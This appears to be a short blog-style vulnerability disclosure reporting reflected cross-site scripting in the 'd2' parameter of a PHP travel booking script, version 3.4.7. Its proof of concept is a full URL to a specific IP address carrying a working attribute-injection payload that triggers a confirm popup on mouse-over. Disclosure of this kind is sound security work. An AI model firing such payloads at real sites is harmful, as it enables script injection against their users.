DESCRIPTION
There is Reflected XSS via the flight-results.php d2 parameter.
Tested in Firefox Dev Edition
VENDOR
PHP Scripts Mall Pvt. Ltd.[Affected Product Code Base]API based travel booking - 3.4.7
POC
1.GO to http://74.124.215.220/~config/cleotravel/flight-results.php?a1=adf&a2=adfdf&d1=&d2=%22Style=%22position:fixed;top:0;left:0;font-size:999px;%22OnMouseEnter=%22confirm`K`%22
REFLECTED XSS POPPED
REFLECTED XSS POPPED
Comments
Post a Comment